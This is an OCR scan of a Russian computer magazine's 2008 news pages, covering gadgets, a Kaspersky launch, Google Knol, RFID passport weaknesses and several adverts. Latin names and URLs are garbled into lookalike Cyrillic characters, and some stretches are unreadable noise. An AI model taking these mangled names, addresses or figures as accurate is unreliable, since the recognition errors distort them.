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Хочустобой поделиться зубодробительным компьютер- 
ным квестом под названием Місгозоі'1: ОІ^Лсе біѵе, который 
я прошел совсем недавно. Это новый сервис мелко-мяг- 
ких, который должен был стать своевременным аналогом 
Ѳоодіе Оос5, позволяя хранить в интернете документы и 
работатьс ними вонлайне. 

Первое, что мне предложил сделать новый сервис после 
регистрации — это скачать апдейтзеШр.ехе весом под 
800 Кб. Нормально, да? Напомню: мы говорим о вебсер- 
висе, который должен позволять легко и быстро получать 
доступ кдокументам из любого места, с любого компьюте- 
ра. Атут — апдейт на 800 Кб. Епрст, да его даже установить 
можнотолько под админскими правами! 



Дальше — круче. Когда я все-таки скачал этотапдейт на 
ноуте (на рабочем компьютере — лимитированный поль- 
зователь), оказалось, чтотеперьуже сам этотзеШр.ехе 
будет докачивать дополнительные файлы. Вся процедура 
заняла окон семь и минутпять времени — апдейт докачи- 
вал что-то из интернета, шуршал винчестером и требовал 
нажатия кнопки «Далее». Опять напомню: речьидето 
вебсервисе. 

Чтожетакое с программистами Майкрософт? Не хватает 
витаминов? Мало йода? 
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МАРИЯ «МІРВІІІ» НЕФЕДОВА 

/ міРніьь@тооіск.ни / 



Обо всем за последний месяц 



В 2007 году 3 6 человек в мире бьши 

арестованы за неосторожные высказывания 



Настоящий дзен 




в блогах. Еще в 2006 таких случаев было 

три раза меньше. 



Чего можно ожидать от компании с названием Сгеаііѵе, какие креатива. 
Уже который год они нам исправно его поставляют, в промышленных 
масштабах. Очередная новинка — лишнее тому доказательство. Это ау- 
диоплеер 2ЕМ Могаіс (англ, «дзен») с кучей полезных мультимедийных 
функций. Итак, что нужно для достижения настоящего дзена? Цветной 
дисплей 1 .8", мощный встроенный динамик, РМ -прием ни к, встроенный 
микрофон, функция диктофона и батарея, способная поддерживать в 
плеере «жизнь» втечение32 часов непрерывной музыки. Добавим к 
этому поддержку картинок формата )ред и видео (только после конверта- 
ции в фирменный формат Сгеабѵе). Новинка имеет крайне любопытный 
дизайн — создатели воплотили во внешности 2ЕМ Могаіс древнейшее 
искусство мозаики и предоставили на выбортри цвета: черный, сереб- 
ряный и розовый. Объем памяти плееров составит2, 4 и 8 ГБ, а осенью 
в магазинах появится 1 6-гиговая модель. Цена будет варьироваться от 
2400 до 4000 рублей, в зависимости отемкости памяти. 



іеты всеі 



фишинг-атак — 37 . 25 % от общего числа. 



Мышь-прилипала 

Кто работает на ноутбуках и часто таскает их с собой, конеч- 
но, сталкивался с одной маленькой проблемкой — посто- 
яннотеряется мышка. Куда-то заваливается, мистически 
исчезая, когда она нужна! Таквот, проблема решаема, и 
решение называется ІодіІесЬ Ѵ550 Мапо. Беспроводной 
лазерный грызун оснащен замечательной штукой СІір-апсІ- 
6о. С помощью этого устройства ( проще говоря, маленькой 
клипсы) мышку можно легким движением руки прилепить 
к крышке ноутбука, и никуда она оттуда больше не денется. 
Прибавим сюда уже традиционную функцию высокоско- 
ростного скролла и крохотный нано-приемник(с монетку 
размером), который достаточно однажды подключить к ПЭВ 
и благополучнозабыть — никаких настроекон нетребует. 
Работает мышка на частоте 2,4 ГГц от двух АА батареек, 
прослужить которые обязуются 18 месяцев. Цена девайса 
— примерно $60. 



► 004 








на правах рекламы 






Цена - 27599 рублей 




ѵѵидѵ./ш.ш 



ЯІІ Втѵо Ноте 126]/\/ но базе суперсовременного четырехьядерного процессора ІпіеІ® Соге™2 ^ио(^ 
- бескомпромиссное решение для требовательных потребителей! Новый четырехьядерный 
процессор /п/е/® Соге™2 ^иаб обеспечивает высочайшую производительность ПК при роботе с 
ресурсоемкими приложениями, создании цифрового контента и компьютерными играми. ІКІІ Втѵо 
Ноте 1 2 6]/\/ изменит Ваше представление о работе но компьютере. 

С 2007 года на компьютерах іА?1/ тренируются чемпионы 
мира по компьютерным играм (дисциплины Соипі^ег Зігіке 
и Л/еес/ ^ог Зреед) - команда Ѵіг^из.рго. 

ши Вгаѵа Ноте М6Ѵ7 

процессор ІпіеІ ® Соге™ 2 ^иос^I ^9300 с чостотой 2.5СН7. 
видеокорто МѴЮІА СеРогсе 9600 СТ с 5 12МЬ памяти 
мультиформатный ОѴО привод 
встроенный кардридер 
гарантия 3 года 

Спрашивайте компьютеры ІРШ в могозинох «ПОЗИТРОН И КА» 
тт.розіітпісо.ги 

Официальный дистрибьютор ПК ІРІІ— компания МЕРНОМ, тт.тегііоп.ги 

ШеІ, логотип ШеІ, Ше! Согв и Соге являются товарными знаками на территарии США и других стран. 




Корпорация Іп^еІ не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений относительно 
конкретных компьютерных систем, упоминание о которых содержится в данном документе. 

©2008 г, Сеіегоп, Сеіегоп ІпБІсіе, Сепігіпо, Сепігіпо ІПБІсІе, логотип Сепі;гіпо, Соге ІпБІгіе, логотип Іпі;еІ, ІпіеІ, Іпі;еІ Соге, Іпі;еІ ІпБІйе, логотип Іпі:еІ Іпзісіе, Іпі;еІ Ѵііѵ, Іпі;еІ ѵРго, Ііапіигп, Ііапіит Іпзійе, 
Реп1:іит, РепСигл Іпвісіе, Ѵііѵ Іпвісіе, ѵРго ІпБІсіе, Хеоп, и Хеоп Іпвісіе являются товарными знаками права на которые принадлежат корпорации Іп1:еІ на территории США и других стран. Реклама. 
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Графические 

мощности 

Наулице сторонников АМО праздник. Компания Азиз 
представила новую материнскую плату МЗА78-Т на чипсете 
АМО 7906Х + 5В750. Обладателями новинки будутсчас- 
тливы стать геймеры, аниматоры и другие люди, плотно 
работающие с графикой. Оснащена плата встроенным 
графическим ядром АТІ Расіеоп НО 3300, которое мож- 
но использоватьвтандемесобычной видеокарточкой 
(технология НуЬгіб ОгоззРігеХ или Оиаб-ОгоззРіге). Можно 
обойтись и без дополнительного видеоадаптера —техно- 
логия ЗібеРогІ: позволяет использовать мощности установ- 
ленного на матери ООРЗ для расширения видеопамяти и 
повышения производительности графики. Азиззаверяет, 
что «преимущество оценят даже те пользователи, которым 
не нужна производительность в играх». Плата также может 
похвастаться технологией Ехргезз баіе: уже через 5 сек. 
после включения компьютера можно пользоваться интер- 
нетом, почти всем спектром мультимедийных функций и 
множеством видеовыходов (втом числе, Р0В(0-5иВ), ВѴІ 
и НВМІ, позволяющими использовать ПКв качестве базы 
поддомашний кинотеатр). 

29% пользователей интернета 
регулярно пок)шают товары, 
рекламируемые спамерами. 



Посещаемость различных женских 

сайтов возросла на 27% по 
сравнению с прошлым годом. 

Черный пояс по 
набору $М8 

Меня всегда поражалоумение некоторых людей набирать5М5 или 
писать стелефона в аську с запредельной скоростью (без рѵѵегіу- кла- 
виатуры, а иногда даже без Т9). Для тех, кто таких высот мастерства не 
достиг (или просто не хочет мучиться), придумали гораздо более удобные 
способы. Например, новый телефон от 10 — К5 360, с выдвижной рѵѵегіу- 
клавиатурой. Пожалуй, идеальный гаджет для любителей чатиться с 
мобилы: есть возможность группировки 5М5, так чтобы был виден и текст 
чата, и имя собеседника, экран 2.4", большой набор смайлов (и конечно, 
уже упомянутая клавиатура). Новинка не обделена и «не-чатовыми» 
нюансами — это 2-мегапиксельная камера с фиксацией фокуса и слот 
под МісгоОВ-карточки. Дизайн, названный разработчиками Ар иа Віие 
(видимо, из-за приятного бирюзового оттенка), добавляет еще один плюс 
в копилку К5 360. В продаже телефон появится ближе к концу сентября. 
Стоить будет 7000 



/ 
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Билайн* 

ЖН.ІН гідр-о«г 

Чтобы приятнее качалось! 

Услуга «6РК8-скидка» 




Чем больше ОРК$-трафика качаешь, тем больше скидка: 

после 2 Мб — 25 % 
после 10 Мб — 40 % 

Подключи услугу при помощи бесплатной команды № И 

Узкай больше О Об 04 26 
ѵ№№^ЬееІіпе.пі 



Лрвиилѵ#н-|^'вѵітк ііь - ■■!!■ ті^і)|^ішііми і пкг>*ѵі ршѵт»я гмгѵгѵніЧ|нт гр^кі іьМ уі4. і ІІ|Р; ■■ I КЪ а* ч^тфін пш 

і ^і-р і и р ім ■уіктуцт у ят з . : рзупД іДрір гд^І» Щ. , мии . 1 | .-р^р|дь*дур|^рррртъ цриіР Р ' мрі Ч і рр дм і і і м иі . " г«1ЬД Пци^ііи дпижіт ? - рі| 

*ьм%- 1ііа №# і* п % !і4м44м^н і« I И» КІ I іш іѵмспиіікі сптл і Иіь. № !Г Т іу^і і " >йъ т ц|і х н№н 1№тц«мн» іФ Нііііімь пчмоилнш [4чі4Ь і ^ 
кіиіі гомисі ■■■■ I л ім ■яшАсжѵ|ч:.^н»РЬіт7Ртлігп' киытз -н віЬіаРМЫ I іѣішпбр йй ШІгш [іьпі м мшр^м ьгш«к=& 

34' I рііииі II гк 7 Ря|''^рппк. Уіатгр ирзакрмны. Дьр і^аі іи іі сз4тт -гп Ьа4тм гм. 11л гр ■■•■ ртинн. 
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Вентиляторов 
много не бывает 

Чем мощнее железо, тем более высокие требования приходится предъявлять к 
системам охлаждения. Есть, конечно, люди, которым наплевать, что на видеокар- 
точке можно жарить яичницу, а процессор медленно, но верно «закипает» под 
сантиметровым слоем пыли... Надеюсь, ты к таким не относишься. Тогда советую 
обратить внимание на новый корпус от компании Сооіег Мазіег. Модель НАР 
932 представляет собой Іиіиоѵѵег, который, с первого взгляда, можно отнести к 
классу Ы-епб. Но сейчас речь нео крутом внешнем виде девайса, а об основной 
его фишке — мощнейшей системе воздушного охлаждения. Четыре вентилятора, 
оснащенных красной диодной подсветкой — три по 230 мм и один 140 мм — спо- 
собны, по словам экспертов компании, заменить любое аппаратное охлаждение. 
Кузов, ктомуже, поддерживаетустановку дополнительных вентиляторов или сис- 
темы водяного охлаждения. Есть дополнительная камера для двойного питания 
и съемный стеллаж для хардов, с антивибрационными прокладками. Цена чуда 
техники пока неизвестна, но вряд ли она будет маленькой. 



96 % юзеров Сети хотя бы раз бьши в инет- 
магазине, а каждый пятый регулярно совершает 
в е-шопах покупки. 



Ѵігизез по равагап! 

В Москве 12-го августа состоялась презентация новых продуктов 
от Казрегзу ЕаЬ. Замечу, что в ряде других стран новинки уже были 
презентованы. Будем надеяться, что винойтомулишь маркетинг, а 
никак не стремление «обкатать» софт перед русским релизом или 
задвинуть российский рынок подальше. Публике представили две 
почти полностью переродившиеся софтины — Іпіегпеі; ЗесигКу 2009 и 
Казрегзу АпОѵігиз 2009. Изменений много. Взять хотя бы новый движок, 
базирующийся на ядре с почти русским именем КЕАѴА. Напомню, до 
этого софт Лаборатории Касперского базировался на движке, который 
не менялся почти 1 0 лет. Особенно порадуются дизайнеры и иже с ними, 
— все, кто громко плакал, что «Каспер вешает систему». Быстродейст- 
виетеперь возрастет в 3-7 раз, а загрузка системы будет шустрее на 
40%. Про скорость — чистая правда, проверяла лично. Плюс, появилась 
поддержка многоядерных процессоров, и движокобладаетобновляе- 
мыми компонентами. 

Изменился интерфейс, стали еще серьезнее методы детектирования, 
добавились родительский контроль, защита для мгновенных сообще- 
ний а-ля ІСО и М5М, виртуальная клавиатура для безопасного ввода 
паролей и многое, многое другое. Почти все это проиллюстрировали 
на презентации. Мужчины с внешностью классическихтелохраните- 
лей, в строгих костюмах с логотипом Казрегзу ЕаЬ на лацкане пиджака 
и микрофоном вухе, безошибочно отлавливали втолпе человека в 
футболке с надписью «МАЛ ВАРЬ», под белы рученьки выводили из 
зала спамера, предлагавшего «Ролекс по 50 долларов» — и так далее, 
в том же духе. Когда же из зала, в самом конце, последовал шутливый 
вопрос от наблюдательного журнал иста: «А я заметил, что охранниктам 
сговорился с «вирусом» и они теперь мило беседуют и что-то едят... Это 
что, у меня на компьютере будеттакже?» — последовал ответ: с новой 
версией продуктов подобного не произойдетникогда. Аохрана, надо 
думать, просто была слегка устаревшая :). Цена остается прежней: 980р. 
за «Антивирус» и 1600р. за «ИнтернетСекьюрити». Болеетого, одна 
коробка ІпІегпеІіЭесигЕутеперьдаетлицензию сразу для двух машин. 
Эксперты сошлись во мнении, что лучше и выгоднее подарить одну 




рігг.г^ «м гЫІ и 



ЮГ • ^ г -1> 

ч-ві» I 



лицензию, чем подталкивать пользователя к продуктам конкурентов 
или пиратским версиям. Переход со старых версий продукта на новые 
— бесплатный. 
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Реклама 




Місгозоі^І:' 



Рогеі^гопі: 



МісгозоП 



разобраться 
с пиратами, 
просто. 



разобраться 
с вредоносным кодом 
проще простого. 



±. Думайте, как пират. 

Лучший способ одержать победу 
над пиратами - это мыслить 
и действовать, как они. После 
нескольких дней, проведенных 
в прикладывании к бутылке 
с ромом, размахивании саблей 
и зависании на мачтах, вы будете 
готовы к схватке один на один, на 
равных. Если нет - ну и ладно, зато 
у вас была пара веселых деньков. 



1 . Внедрите Місгобо^і Роге^гопі. 

с помощью МісгоБОІ^І; Рогеі^гопі: вы сможете 

защитить вашу систему еще проще. Это семейство 
продуктов информационной безопасности, 
обеспечивающее целостную, интегрированную 
и простую в использовании защиту клиентов, 
серверов и периметра сети. Примеры внедрения, 
пробные версии и все последние обновления 
смотрите на ѵѵѵѵѵѵ.рго5Нерго$Іодо.ги 



2 . Скормите их рыбам. 

Общеизвестно, что пираты - большие любители заставить своих 
жертв «пройтись по корме и покормить рыб». Используйте это 
против нихже самих. Сыграйте роль торговца пиломатериалами 
и продайте им новую доску, намного лучше, из современных 
композитов. Так и скажите. Предложите им испытать доску, 
и в тот момент, когда они на нее встанут, - откройте правду. 
Такое унижение заставит их отстать от вас. 



Місго501^1: Рогеі^гопі: - это программное обеспечение 
для защиты клиентов, серверов и сетевого пери- 
метра вашей компании. 



Э. Откупитесь от них. 

Навязчивая идея пиратов - V 

добыча и сокровища. Они -ді 

наверняка польстятся на мешок 
или сундук с золотыми шоколадными 
монетами. Пиратам захочется тайно 
закопать их где-нибудь, поэтому 
они потеряют интерес к вам - 
своей первоначальной цели. 



Примените свои навыки 
Берд-Фу. 

Берд-Фу - это древнее искусство 
ближнего боя. Хватайте и тяните 
пирата за бороду, крутите его за усы, 
дергая их при этом. Самое смертель- 
ное из всех боевых искусств - если 
дергать изо всех сил. 

Найти учителя по Берд-Фу 
в наши дни трудновато, ■ 

но можно скачать | 

самоучитель в Интернете. 



!>• Подеритесь с ними, 
а потом - присоединяйтесь. 

Жизнь морских разбойников может 
быть не так уж плоха. Вы вырветесь 
из четырех стен, увидите мир, 
грабежи с абордажами, да и вообще 
грандиозно проведете время. 
Выучить несколько матросских 
песен, научиться танцевать джигу, 
носить на плече попугая - 
и вы готовы покорить мир. 
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$^N изволит шутить 

Совсем недавно полмира наблюдало шоу невиданного размаха, посмотреть которое 
теперь еще долго не удастся — солнечное затмение. Если ты об этом не знал или 
все пропустил, это, наверное, повод задуматься. Например, о чем-нибудьумном и 
вечном... Оказывается, солнечное затмение и то можно использовать в своих целях. 
Пусть и шуточного пиара ради. Отличилась компания 50ІМ (англ, «солнце»), обнаро- 
довавшая несколько дней спустя пресс-релиз, в котором говорилось, что «отключе- 
ние солнца на территории России прошло успешно» и «все планируемые профилак- 
тические работы проведены успешно и в срок». 5ПМ также выражали надежду, что 
нам понравился их сервис и со всей ответственностью заявили, что «поддержание 
высокой готовности ключевых компонентов Солнечной системы является важным 
элементом обеспечения непрерывности функционирования планеты Земля». Кста- 
ти, следующее отключение солнца натерритории РФзапланировано на 12августа 
2026 года, не пропусти. 



Горячая линия рунета 



Г: . . 



В рунете начал свою 
работу проекте 
громким названием 
«Национальный узел 
безопасности» [ ЬФр:// 
заІегипеЕги І. органи- 
зованный региональ- 
ным общественным 
центром интернет-тех- 
нологий (РОЦИТ). Сайт, 

призванный бороться со всяческими сетевыми угрозами и нелегаль- 
щиной, делится натри части — информационно-аналитический ресурс, 
консультационная линия и «горячая линия», куда можно будет отсылать 
анонимки о злачных местах и нарушениях в Сети. На западе практика 




такого стукачества широко распространена, но вот для нас это пока в 
новинку. Более того, сам РОЦИТ не имеет полномочий закрывать«нехо- 
рошие» ресурсы (но заверяет, что силовые ведомства РФ на их стороне). 
Пока сайт полупуст, но ведущий аналитик РОЦИТа Урван Парфентьев 
считает, что это вскоре изменится — сразу, кактолько начнется активная 
работа с пользователями. Пока же на узле нац. безопасности можно 
найти разве что статьи о детской порнографии (без картинок), киберза- 
висимости, экстремизме... итому подобные вещи, которых в Сети и без 
того хватает. Линия помощи пока вообще не функционирует, а первое, что 
нам предлагаютзаполнить в форме «горячей линии» — это поля «ФИО» 
и «Город». Оригинальная получается анонимность. Конечно, борьба с 
такой мерзостью, какдетское порно — дело хорошее, да и общественные 
организации такого рода нужны, но все же, некоторым людям о существо- 
вании интернета лучше не знать. И интернету спокойнее, и им самим. 



[на 1 

России, Индии и Китая) — с 11 . 2 % от общего числа пользователе 




Однажды они получат «Оскар» 



В фантастических фильмах и книжках не раз проскакивала идея, что 
в кино будущего будут играть не живые люди, а лишь компьютерные 
модели. И какэто часто бывает, похоже, прогнозы фантастов начинают 
сбываться. Компания Ітаде Меігісз решила продемонстрировать 
миру свои достижения и выпустила видео, которое легко можно найти 
на УоиТиЬе. В ролике девушка по имени Эмели рассказываете новой 
технологии, при помощи которой она сама создана. Даже зная, что это 
лишь компьютерная графика, на вид Эмели сложно отличить от живого 
человека. До сегодня такого эффекта не мог добиться никто. На созда- 



ние моделей тратились годы, но они все равно оставались «неживы- 
ми». А в Ітаде Меігісз придумали методику, благодаря которой можно, 
не крепя на человека никаких датчиков, считать все его движения, 
включая самую мелкую мимику, и воспроизвести результатуже в виде 
компьютерной модели. В связи с этим высказался главный техничес- 
кий директор АМВ — Раджа Кодури. Он заверил, что новые видеокарты 
смогут обсчитывать та кие вещи уже в реальном времени, а оконча- 
тельно грань между человеком и компьютерной моделью сотрется к 
2020 году. Похоже, технологический прорыв совершен! 
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Товар сертифицирован. Реклама. 



БЕЛЫМ ПО ЧЕРНОМУ И 



ЛИ ЧЕРНЫМ ПО БЕЛОМУ 




С принтером МІ-2245 люба 

Представьте... профессиональные технологии у Вас на 
с раздельными тонером и барабаном обладает рядом 
на печать снизятся на 50%, скорость увеличится до 22 
на прежнем высоком уровне. Затзипд МІ-2245. Всегда 



я печать в 2 раза выгоднее! 

столе. Компактный лазерный принтер Затзипд МІ-2245 
бесспорных преимуществ. Например, Ваши расходы 
страниц в минуту, при этом качество работы останется 
на высоте. 






Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 
Галерея Затзипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. ѵѵѵѵѵѵ.затзипд.сот. 
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Новые законы, 
новая головная боль 

В СШАутвердили очередной документ, призванный усложнить 
людям жизнь. Теперь их служба таможенного контроля вправе изъять 
для проверки сроком до трех недель практически любой электрон- 
ный девайс, будьте ноутбук, КПК, фотоаппарат, плеер... —то, на чем 
можнохранить информацию. Раньшетаможенники, какправило, 
просто просили включить прибор и осматривали его на месте. Теперь 
все сильноусложнилось. По сути, отнынетаможня оставляетза собой 
право разобрать твой ноут на запчасти и перелопатить все содержи- 
мое винтов. Делается это, конечно, в целях борьбы стерроризмом, 
контрабандой наркотиков, детской порнографией и прочим Вселен- 
ским Злом. Кто конкретно до этого додумался, история умалчивает. А 
жаль, хотелось бы знать «героя» в лицо. Дорогой читатель, будь готов 
расстаться с флешкой из фотоаппарата, со своим наладонником или 
ноутом, если собираешься ехать в Штаты. 



Кпоі к! 



Лавры Википедии недают 
покоя тысячам умов, и это 
понятно. ѴѴікі — настоящий 
сетевой феномен, наравне 
с УоиТиЬе и другими серви- 
сами, без которых было бы 
проблематично представить 
сегодняшний интернет. Можно 
много спорить о достоверности 
ее материалов, но достойных 
конкурентов на данный момент 
у Википедии практически нет (хотя аналогов немало). И возможно, 
это вскоре изменится. Один из тяжеловесов ІТ-рынка — компания 
Ооодіе — закончила работу над своей версией сетевой энцикло- 
педии и представила ее публике. Новый сервис получил имя Кпоі 
[ ЬирѴ/кпоІ.доодІе.сот ]. Работа над ним велась с декабря прошлого 



года. Еще в начале разработки Ооодіе заявили, что хотят делиться 
с людьми полезными знаниями — безвозмездно, то есть даром. 

Кпоі почти сразу окрестили «боодіересііа» и «Вики-убийца». Но 
непохожестей много. В отличие от Вики, написать и отредактиро- 
вать статью анонимно нельзя — автор должен зарегистрироваться и 
«представиться», чтобы можно было оценить точность информации. 
Также статью нельзя менять без разрешения ее создателя, но можно 
написать своюпотойже тематике — несколько материалов по 
одной теме допустимо. Наконец, материалы можно оценивать. И... 
здесь есть реклама. Опять же, с разрешения автора, на странице 
статьи может отображаться контекстная реклама Ооодіе. Более того, 
автор будет получать с нее проценты. Конечно, многие ученые будут 
рады увидеть свое авторство, да еще и получить за все это деньги. 
Для ярых противников Википедии Кпоі — как раз то, что надо. Но 
встает вопрос, что такое Кпоі для самой Ооодіе — очередная рек- 
ламная площадка или серьезная сетевая энциклопедия? 




Из жизни социальных сетей 



В сфере русских социальных сетей страсти кипят, почти не утихая. 
Обязательно кто-то с кем-то судится, что-то крадету ближнего и пытается 
срубить побольше денег. «Одноклассники» — не исключение. Для начала 
они успели отстоять в суде свое честное (в смысле, уникальное) доменное 
имя. Скандально известная компания «КМ онлайн» имела неосторож- 
ность переименоватьсвой сервис сіаззтаіез. кт. ги в обпокіаззпікі. 
кт. ГУ . Кстати, именно «КМ онлайн» в свое время пытались прикрыть биб- 
лиотеку Мошкова и другие сетевые читальни. В случае с«Одноклассни- 
ками» им снова не повезло — на них подали в суд, и дело решилось не в 
их пользу. Арбитражный суд Москвы запретил им использовать название 
«Одноклассники» и приговорил кштрафу в 100.000 рублей за нарушение 
интеллектуальной собственности. А в это время сами «Одноклассники», 
наконец, начали запускать платные сервисы. Этого ждали давно, и оно 
пришло. Начали пока с малого: появился платный режим невидимки, 
активируемый посредством 5М5. Сто с хвостиком рублей — и целый 
месяц смотри, чьи угодно странички, люди увидят л ишь сообщение: «Вас 
посетил(а) невидимка». Такие схемы неплохо показали себя взападных 
социальных сетях (у них платных сервисов много, очень много). Что вый- 
дету нас, пока можнотолько гадать. Режим невидимки — лишьпробный 
шар и уже скоро можно будет судить, оправдаетон себя или нет. 
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в 2012 году к интернету будет подключено примерно 1^9 миллиарда человек (30% 
всего населения Земли) . 



Электронные документы 
терпят поражение 



Похоже, политики, ратовавшие за законы о 
смене паспортов на электронные, угодили 
в большую лужу. Непоколебимая истина о 
том, что «все, что зашифровано человеком, 
может быть им же взломано» очередной 
раз оправдывается. О несовершенстве 
нововведения говорили давно, но сильные 
мира сего не захотели прислушиваться. 

И вот, когда люди начали активно менять паспорта на электронные, 
выплылотакое количество нелицеприятных подробностей, что не 
обращать внимания стало сложно. Для начала, на конференции 
Віаск Наі: было продемонстрировано, что сигнал ПРІО-чипа можно 
глушить и удаленно снять с него данные. Это само по себе разрушает 



миф о невозможности взлома. Газета Тітез провела исследование 
и опубликовала жутковатые результаты: РРІ 0-чип можно взломать и 
клонировать всего за час. И если в Тітез всего лишьзаменили фото- 
графии владельцев документа на фото Усамы Бен Ладана (нормальноу 
ребятс чувством юмора), то специалисты утверждают, что также легко 
можно манипулировать и хвалеными биометрическими данными. А 
ведь на уникальности биометрики и невозможности ее подделки и 
строится вся система защиты — сам по себе электронный паспорт от 
клонирования защищен очень слабо. В итоге, жители 45 стран мира, 
где электронные паспорта уже пошли в народ, оказались в незавидном 
положении. Отдельно «радует» тот фа кт, что Россия тоже рассматрива- 
ет возможность перехода на паспорта на основе РРІВ-чипа. 




сравнению с прошлым годом. 
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Проекторы Ерзоп. Новая реальность! 



Кино, компьютерные игры и любимые 
ТВ-передачи на экране размером во всю стену! 
С проектором Ерзоп у Вас дома! 
Большой экран, качественное изображение, 
комфортный просмотр без усталости глаз - 
полное погружение в действие на экране. 




Экран до 7 м 7 000 000 000 

(диагональ 300") цветов 



РиІІНО 

1080 р 






от 19 950ііу6лей* 





Узнайте больше на ѵѵѵѵѵѵ.ерзоп.ги 



ЕР80Ы 

ЕХСЕЕО уоив ѴІЗІОМ 



Москва: Розіегдгоир (495) 921-47-47 • ДеЛайт2000 (495) 225-225-8 • Имидж.Ру (495) 737-37-27 • Лазерный Мир (495) 913-51-82 • ОнЛайн Трейд (495) 737-47-48 • Цифровые Системы (495) 787-44-88 • Роіагіз (495) 755-55-57 
В5І (495) 514-14-19 • ЗІагШазІег (495) 785-85-55 • Полимедиа (495) 956-85-81 • Техносила (495) 777-87-77 • Астрахань: ТАН (8512) 39-42-54 Барнаул: ГАЛЭКС (3852) 65-38-01 Белгород: Инфотех (4722) 26-36-18 
Благовещенск: А-Эл-Джи Софт (4162) 52-22-60 Воронеж: Рет (4732) 77-93-39 Екатеринбург: Трилайн (343) 378-70-70 Иркутск: ѴЮ МЕОІА (3952) 53-39-19 Казань: Дарфф (843) 299-71-24 Калининград: Ноітгоск 
(4012) 57-28-57 • Махітиз (4012) 300-350 Краснодар: Владос (861) 210-10-01 Курск: ФИТ (4712) 51-25-01 Минск: АІІѴізіоп (017) 237-45-90 • Белана (017) 207-81-18 • ПринтЛюкс (017) 216-19-22 Набережные Челны: 
Форт Диалог (8552) 59-92-20 • Элекам (8552) 59-82-33 Н. Новгород: Домашний компьютер (831) 277-82-92 • Юст (831) 230-16-74 Новосибирск: ГОТТИ (383) 362-00-44 • НЭТА (383) 304-10-10 • Техносити (383) 332-41-63 
Омск: РИТМ (3812) 23-65-27 Пермь: Гармония (342) 212-11-66 Ростов-на-Дону: СОМРОТЕВ - СІТУ (863) 295-03-33 • 8ТУШ8 (863) 240-59-67 • Офисный Мир КМ (863) 253-65-00 Самара: ПРАГМА (846) 270-17-01 
Санкт-Петербург: БМК (812) 232-4012 • Викинг (812) 293-30-03 • КЕЙ (812) 074 • Компьютерный Мир (812) 333-00-33 Саратов: КомпьюМаркет (8452) 50-40-40 Уфа: Кламас (347) 291-21-12 • Форте-ВД (347) 260-00-00 
Хабаровск: Гермес (412) 31-55-57 Ярославль: Тензор (4852) 406-400 
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I Ат КісЬ апсі I Ат Ісііоі 



Агшіп Неіпгісіі 

I Ат НІСІ1 

С^іадогу: ЫОіТуіе 
НоЕоазссІ Аид 05, 2000 
ВаЛог: Агтіп Неіпг^ 
ф гоое Алпіп К«ігігіс 1 і 
ѴМіоп: 1Л 
0.1 ма 



5999.» I ЯШ АИ* ^ 

История на грани маразма приключилась в вотчине Арріе — онлай- 
новом магазине Арр Зіоге, где торгуют приложениями для іРЬопе и 
іРосІ. На виртуальном прилавке появилась странная штуковина под 



названием «I Ат РісЬ» (англ. «Я богат»), по максимальной для магази- 
на стоимости $999.99. В описании честно говорилось, что это — произ- 
ведение искусства без какого-либо функционала, всего лишь красивая 
иконка, которая будет каждый день напоминать владельцу, что он крут и 
бесконечно прекрасен. Впрочем, помимо иконки в приложении имеет- 
ся еще «секретная мантра», повторение которой, видимо, поможет вла- 
дельцу иконки оставаться таковым и в будущем. Вероятно, со стороны 
разработчика — Армина Хайнриха — это была своего рода шутка (пусть 
и довольно дурацкая). Но, разумеется, нашелся идиот, который нажал 
кнопку «Виу», решив, что это какой-то розыгрыш и не может бесполез- 
ная фигня стоиттысячу баксов. Оказалось, может. Удивленный, покупа- 
тель позвонил в свой банк, убедился, что все по-настоящему и кинулся 
писать гневные письма, куда только смог. Нивчемне повинную фе- 
нечку тутже убрали из магазина. Ксожалению, неизвестно вернули ли 
«пострадавшему» деньги. Если вдуматься — могли и не возвращать. А 
само приложение уже было взломано каким-то альтруистом (да-да, его 
купил не один человек!) и теперь свободно гуляет по Сети. На УоиТиЬе 
по запросу «I Ат Вісб» можно найти в идео -рол и к, демонстрирующий и 
секретную мантру, и само «произведение искусства». 





Крыса в доспехах 



Кажется, среди ученых есть настоящие злые гении. Группеученых из 
британского университета Рэдинга удалось создать робота, которым 
управляют нейроны крысиного мозга. Эти исследования, разумеется, 
проводятся во благо — пытаются найти лекарство от болезни Альц- 
геймера, но результат шокирует. Отделенные оттела крысы нейроны 
поместили в смесь питательных веществ с антибиотиками, и те приня- 
лисьустанавливать между собой связи так, будто все еще находятся в 
теле. На данный момент«связались»уже более 300.000 нейронов (для 



сравнения — в человеческом мозгу их свыше 200 млрд.). Они уверенно 
посылают друг другу электрические импульсы (можно сказать, живут 
обычной жизнью). Также, к ним поместили контроллер, при помощи ко- 
торого сумели заставить (судя по всему, посылая в клетки болевые или 
аналогичные сигналы) «мозг» управлять простеньким роботом, огибая 
препятствия. Достижение определенно впечатляет, только почему-то 
первые мысли возникают не о лекарствах, а о военных разработках и 
безрадостном будущем... 
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Дневник из прошлого 



Сетевой серфингдело, бесспорно, хорошее, но не все ведь читать 
новости, блоги, копаться на том же Оідд’е или работать. Порой нужно 
и что-то для души, что-то весомое и интеллектуальное. Начиная с ав- 
густа, ресурс ТЬе Огѵѵеіі Ргіге [ бир : /ѵѵѵѵѵѵ.ібеогѵѵеиргіте.со.ик ] будет 
публиковать на своих страницах дневник писателя Джорджа Оруэлла 
автора легендарной антиутопии «1984». Публикации будут в форме 
блога — а новые записи станут появляться по тем же числам, по кото- 
рым писал в свой дневник Оруэлл. Вел он его на протяжении четырех 
лет, с 1 938 по 1 942, и писал обо всем: о войне, политике, журналис- 
тике. Подобный проект, конечно, далеко не первый в Сети, но Оруэлл 
заслуживает отдельного упоминания! 




Блог новой Винды 

То, что Місгозоі'іуже работает над следующей версией ѴѴіпсІоѵѵз — ни 
для кого не секрет. Мелкомягкие, вообще, никогда не стоят на месте. 
Так как Виста не оправдала и половины возложенных на нее надежд, 
реабилитироваться в глазах публики придется уже системе ѴѴіпсІоѵѵз 
7 (именнотакое имя пока носит разработка). Чтобы осветить весь 
процесс работы над Осью, был открытспециальный блог — Ыір://Ыодз. 
тзс1п.сопп/е7 . Ведут его два старших менеджера проекта — Джон Де- 
ваан и Стивен Синофски. Что актуально, блог дублируется на несколько 
языков, в числе которых есть русский. Синофски втечениетрехлет 
изучал великий и могучий, так что на комментарии в русском зеркале 
он отвечает лично. Информации в блоге пока немного (ведь основные 
